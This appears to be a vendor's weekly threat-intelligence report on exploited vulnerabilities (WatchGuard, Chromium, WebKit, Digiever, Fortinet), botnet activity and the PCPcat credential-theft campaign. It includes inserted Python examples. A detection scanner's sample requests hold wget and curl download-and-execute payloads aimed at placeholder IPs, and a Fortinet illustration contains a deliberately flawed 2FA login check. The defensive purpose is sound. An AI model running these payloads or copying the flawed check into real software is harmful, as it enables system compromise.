Executive Summary
This week’s observations reflected a continued surge in exploitation activity spanning legacy devices, perimeter security platforms, and modern web frameworks. Two vulnerabilities were added to the CISA KEV catalog, impacting WatchGuard Firebox appliances and an end-of-life Digiever DS-2105 Pro NVR, highlighting active abuse of both enterprise and IoT infrastructure. In parallel, renewed exploitation was observed against a five-year-old Fortinet flaw, reinforcing how older vulnerabilities remain valuable to attackers.
Botnet operators including EnemyBot, Sysrv-K, Andoryu, and Androxgh0st intensified campaigns against exposed cloud services, routers, and web applications by abusing misconfigurations and unpatched systems.
At the same time, the Beelzebub Research Team uncovered Operation PCPcat, a highly automated credential theft campaign exploiting Next.js and React2Shell vulnerabilities to compromise cloud-hosted applications at scale.
Key points:
- 2 vulnerabilities added to the CISA KEV catalog, reflecting recent exploitation activity.
- Renewed exploitation of a 5-year-old Fortinet flaw.
- Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
- Operation PCPcat compromised over 60,000 servers in 48 hours.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2025-14174 - Out of Bounds Memory Access Vulnerability in Google Chromium
An Out-of-Bounds Memory Access vulnerability in Google Chromium’s ANGLE graphics layer allowed remote attackers to trigger unauthorized memory access through a crafted HTML page, potentially impacting any Chromium-based browser such as Google Chrome, Microsoft Edge, and Opera. The flaw was initially tracked under Chromium issue ID 466192044, with details about the component and CVE assignment intentionally withheld. Evidence later confirmed that it was exploited as a zero-day in the wild, prompting urgent security responses. Google has issued patches in Chrome versions 143.0.7499.109/.110 for Windows and macOS and 143.0.7499.109 for Linux to mitigate the risk. The vulnerability has since been added to the CISA KEV catalog, underscoring its active exploitation and the need for immediate remediation.
CVE-2025-14733 - Out of Bounds Write Vulnerability in WatchGuard Firebox
An Out-of-Bounds Write vulnerability in WatchGuard Fireware OS allowed unauthenticated remote attackers to achieve arbitrary code execution by targeting the iked process responsible for IKEv2 negotiations on Firebox appliances. The flaw impacted both Mobile User VPN and Branch Office VPN configurations using IKEv2 with dynamic gateway peers, exposing critical perimeter infrastructure. WatchGuard linked active exploitation to IPs 45.95.19[.]50, 51.15.17[.]89, 172.93.107[.]67, and 199.247.7[.]82, released Indicators of Attack for detection, and issued multiple patched versions. The issue has since been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring confirmed in-the-wild abuse.
CVE-2025-43529 - Use-After-Free WebKit Vulnerability in Apple Multiple Products
A Use-After-Free vulnerability in Apple's WebKit engine affected multiple products, including iOS, iPadOS, macOS Tahoe, tvOS, watchOS, visionOS, and Safari, and allowed remote code execution when processing maliciously crafted web content. Apple confirmed that the flaw discovered by Google’s Threat Analysis Group impacted any HTML parser relying on WebKit, extending risk beyond native Apple platforms to third-party products embedding WebKit. Although technical details were withheld, Apple acknowledged that CVE-2025-43529 and CVE-2025-14174 may have been exploited in an extremely sophisticated, targeted spyware campaign against individuals on versions of iOS prior to iOS 26. The vulnerability has been resolved in iOS/iPadOS 26.2, iOS/iPadOS 18.7.3, macOS Tahoe 26.2, tvOS 26.2, watchOS 26.2, visionOS 26.2, and Safari 26.2. It was recently added to the CISA KEV catalog, following confirmation of in-the-wild exploitation.
CVE-2023-52163 - Missing Authorization Vulnerability in Digiever DS-2105 Pro
A Missing Authorization vulnerability in the DigiEver DS-2105 Pro NVR allowed attackers to perform command injection via the time_tzsetup.cgi endpoint, leading to remote code execution. The device, widely used in surveillance environments for managing IP camera feeds, had reached end-of-life and was no longer supported by the vendor, leaving no official patch available. Although exploitation required an authenticated session, attackers were observed abusing weak controls to deploy malware and compromise exposed systems. The flaw has since been added to the CISA KEV catalog, prompting guidance to avoid internet exposure and rotate default credentials immediately.
CVE-2020-12812 - Improper Authentication Vulnerability in Fortinet FortiOS
An Improper Authentication vulnerability in Fortinet FortiOS SSL VPN allowed users to bypass two-factor authentication by simply changing the case of their username when local users with 2FA were mapped to remote authentication backends such as LDAP. The flaw stemmed from inconsistent case-sensitive matching between the local and remote authentication checks and was initially discovered and patched by Fortinet in July 2020. The vulnerability later came under active exploitation in the wild by multiple threat actors and was listed by the U.S. government among weaknesses abused in attacks on perimeter devices in 2021. In a December 24, 2025 advisory, Fortinet reiterated the affected configurations and urged customers to review logs, contact support, and reset credentials if evidence of VPN or admin access without 2FA was observed.
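The flaw class described above, as an added illustration written for this page (it is not Fortinet's code and does not reproduce FortiOS internals): a local policy table that decides whether 2FA is required is consulted with an exact-case lookup, while the password is verified against a remote backend that matches usernames case-insensitively. The user table, the stand-in backend, the login-record field names and the sample events are all constructed assumptions. The hardened variant canonicalizes the name once and fails closed, and the last function is the kind of log review the advisory asks administrators to perform:

```python
"""Added illustration of the authentication-matching flaw class behind
CVE-2020-12812, written for this page; it is NOT Fortinet's code and the
user table, backend and login events are constructed sample data."""

# Constructed local user table (canonical lowercase names -> 2FA enforced?).
LOCAL_USERS = {"alice": True, "bob": True}

# Constructed stand-in for a remote backend such as LDAP, whose username
# matching is commonly case-insensitive.
REMOTE_BACKEND = {"alice": "correct-horse", "bob": "battery-staple"}


def remote_password_ok(username, password):
    """Case-insensitive credential check, as an LDAP bind typically behaves."""
    directory = {k.lower(): v for k, v in REMOTE_BACKEND.items()}
    stored = directory.get(username.lower())
    return stored is not None and stored == password


def vulnerable_login(username, password, otp_supplied):
    """The flaw class: the 2FA decision is made with an exact-case lookup of
    the local table, while the password is verified case-insensitively
    against the remote backend.  A case variant of a 2FA user therefore
    misses the local entry, is treated as 'no 2FA configured', and is
    granted access on the password alone."""
    requires_2fa = LOCAL_USERS.get(username, False)
    if not remote_password_ok(username, password):
        return "denied"
    if requires_2fa and not otp_supplied:
        return "otp_required"
    return "granted"


def hardened_login(username, password, otp_supplied):
    """Fix: canonicalize once, use the canonical name for every lookup, and
    fail closed for any name the local policy table does not know."""
    canonical = username.strip().lower()
    if canonical not in LOCAL_USERS:
        return "denied"
    if not remote_password_ok(canonical, password):
        return "denied"
    if LOCAL_USERS[canonical] and not otp_supplied:
        return "otp_required"
    return "granted"


# Constructed successful-login records of the kind the advisory asks
# administrators to review (field names are assumptions, not a vendor format).
SAMPLE_LOGIN_EVENTS = [
    {"user": "alice", "mfa": True,  "src": "203.0.113.5"},
    {"user": "ALICE", "mfa": False, "src": "198.51.100.9"},
    {"user": "bob",   "mfa": True,  "src": "203.0.113.7"},
    {"user": "Bob",   "mfa": False, "src": "198.51.100.20"},
    {"user": "carol", "mfa": False, "src": "203.0.113.8"},
]


def suspicious_logins(events, local_users=LOCAL_USERS):
    """Flag logins whose username is a case variant of a 2FA-enforced local
    account and that completed without a second factor."""
    hits = []
    for ev in events:
        canonical = ev["user"].lower()
        if (local_users.get(canonical)
                and ev["user"] != canonical
                and not ev["mfa"]):
            hits.append(ev)
    return hits
```

The design point is that every policy decision and every credential check must operate on the same canonical identity; normalizing in only one of the two paths is exactly what produces a bypass.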
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
What botnet activity was observed this week?
Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets; the observed payloads, such as wget commands fetching files from specific IP addresses, are characteristic of botnet activity and point to ongoing automated exploitation campaigns.
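A detection routine for the payload pattern just described, added here as an example (it is not Cytellite, MISP or LOVI code): it decodes each HTTP request, flags a download tool pulling from a raw IP address, and notes whether the payload also attempts execution. The request lines are constructed, with documentation-range addresses standing in for real infrastructure:

```python
"""Added detection example (not Cytellite/MISP code): flag HTTP request
payloads that fetch a file from a raw IP with wget/curl/tftp, the pattern
the text above names as indicative of botnet activity.  Sample requests
are constructed."""
import re
from urllib.parse import unquote, unquote_plus

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"

# A download tool, then (lazily) anything up to a URL scheme or whitespace,
# then a raw IPv4 address with an optional port.
DOWNLOAD_RE = re.compile(
    r"\b(wget|curl|tftp|ftpget)\b[^;|&]*?(?:[a-z]+://|\s)(" + IPV4 + r")(?::\d+)?",
    re.I,
)
# Follow-on execution: piping into a shell, or making the download executable.
EXEC_RE = re.compile(r"\|\s*(?:ba)?sh\b|chmod\s+(?:\+x|[0-7]{3,4})", re.I)

# Constructed request lines, roughly in access-log request form.
SAMPLE_REQUESTS = [
    "GET /index.php HTTP/1.1",
    "POST /cgi-bin/setup.cgi?cmd=wget%20http://203.0.113.45/bins/x86%20-O%20/tmp/x;chmod%20%2Bx%20/tmp/x;/tmp/x HTTP/1.1",
    "GET /?q=curl+http://198.51.100.7:8080/sh|sh HTTP/1.1",
    "GET /static/app.js HTTP/1.1",
    "GET /?u=wget+https://example.org/file.txt HTTP/1.1",
    "GET /?x=wget%2520http%253A%252F%252F192.0.2.10%252Fa.txt HTTP/1.1",
]


def decode_payload(line):
    """Undo form encoding once, then plain percent-decoding once more so a
    double-encoded payload (%2520 -> %20 -> space) is still inspected."""
    text = unquote_plus(line)
    if "%" in text:
        text = unquote(text)
    return text


def scan_request(line):
    """Return a finding dict for a download-from-IP payload, else None."""
    text = decode_payload(line)
    m = DOWNLOAD_RE.search(text)
    if not m:
        return None
    return {
        "tool": m.group(1).lower(),
        "ip": m.group(2),
        "execution": bool(EXEC_RE.search(text)),
        "raw": line,
    }


def scan_requests(lines):
    """Scan many request lines; findings keep input order."""
    return [f for f in (scan_request(l) for l in lines) if f]
```

A hostname-based download (the example.org line) is deliberately not flagged, matching the heuristic in the text; the extracted IP is the value an analyst would pivot on for enrichment or blocking.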
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
Emergence of Operation PCPcat
Beelzebub Research Team reported the discovery of "Operation PCPcat", a highly automated and efficient credential theft campaign that weaponized vulnerabilities in the Next.js and React frameworks to compromise cloud-hosted web applications at scale. Identified through a Docker honeypot, the operation exploited CVE-2025-29927 and CVE-2025-55182 to breach 59,128 servers in less than 48 hours, demonstrating an unusually high success rate compared to typical mass-scanning campaigns. The activity reflected precision targeting rather than opportunistic “spray and pray” attacks, underscoring the campaign’s operational maturity and impact. Organizations operating public-facing Next.js or React services were urged to apply patches immediately, block the command-and-control address 67.217.57(.)240, and rotate any credentials exposed through environment files to contain potential compromise.
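The WatchGuard source addresses and the PCPcat command-and-control address above are published defanged. The following added example (not LOVI, WatchGuard or Beelzebub code) shows how to refang exactly those indicators, validate them, and sweep them against log lines; the log lines, their format, and the non-indicator addresses in them are constructed:

```python
"""Added example (not LOVI, WatchGuard or Beelzebub code): refang the
defanged indicators quoted in this report and match them against
constructed firewall/proxy log lines.  Log lines and formats are
constructed for illustration."""
import ipaddress
import re

# Indicators exactly as defanged in the report text above; nothing added.
PUBLISHED_IOCS = [
    "45.95.19[.]50", "51.15.17[.]89", "172.93.107[.]67", "199.247.7[.]82",  # CVE-2025-14733 activity
    "67.217.57(.)240",                                                        # Operation PCPcat C2
]

DEFANG_DOT_RE = re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]|\(dot\)", re.I)
DEFANG_SCHEME_RE = re.compile(r"^hxxps?://", re.I)


def refang(indicator):
    """Turn common defanging ([.], (.), [dot], hxxp://) back into a usable indicator."""
    text = DEFANG_DOT_RE.sub(".", indicator.strip())
    return DEFANG_SCHEME_RE.sub(
        lambda m: "https://" if m.group(0).lower().startswith("hxxps") else "http://",
        text,
    )


def load_ip_iocs(indicators):
    """Refang and validate; returns the set of normalized IP strings."""
    iocs = set()
    for ind in indicators:
        try:
            iocs.add(str(ipaddress.ip_address(refang(ind))))
        except ValueError:
            continue  # domain/URL indicators would go to a separate matcher
    return iocs


IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed lines; addresses other than the IoCs are documentation/private ranges.
SAMPLE_LOG = [
    "2025-12-26T10:01:02Z fw allow src=203.0.113.9 dst=198.51.100.4 proto=udp dport=500",
    "2025-12-26T10:01:05Z fw allow src=45.95.19.50 dst=198.51.100.4 proto=udp dport=500",
    "2025-12-26T10:02:11Z proxy CONNECT 67.217.57.240:443 from 10.0.5.21",
    "2025-12-26T10:02:30Z fw allow src=10.0.5.22 dst=192.0.2.77 proto=tcp dport=443",
]


def match_log(lines, ioc_set):
    """Return (line_number, matched_ip) pairs for every IoC seen in the log."""
    hits = []
    for n, line in enumerate(lines, 1):
        for ip in IPV4_RE.findall(line):
            if ip in ioc_set:
                hits.append((n, ip))
    return hits
```

Validating through `ipaddress.ip_address` after refanging catches malformed or truncated indicators before they reach a blocklist, and normalizing both sides to the same string form keeps the matcher an exact set lookup rather than a substring search.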
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
Collectively, these developments show how attackers continued to blend exploitation of legacy systems with rapid weaponization of modern application flaws to maximize impact. The shrinking gap between disclosure and abuse reinforced the need for continuous visibility and faster response across environments. Loginsoft Vulnerability Intelligence (LOVI) enables teams to track emerging exploitation trends, prioritize high-risk exposures, and act before threats escalate. With real-time intelligence and actionable insights, LOVI helps organizations stay resilient against both old and new attack paths.
FAQs:
1) What is React2Shell and why is it appealing for threat actors?
A) React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.
2) How does LOVI help organizations manage vulnerabilities effectively?
A) Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.
3) What is WatchGuard Firebox?
A) WatchGuard Firebox is a next-generation firewall appliance that delivers unified threat management, VPN, intrusion prevention, and network security for enterprise and branch environments. It is powered by WatchGuard Fireware OS and is widely used to secure perimeter and remote access infrastructure.
4) What is Cytellite?
A) Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.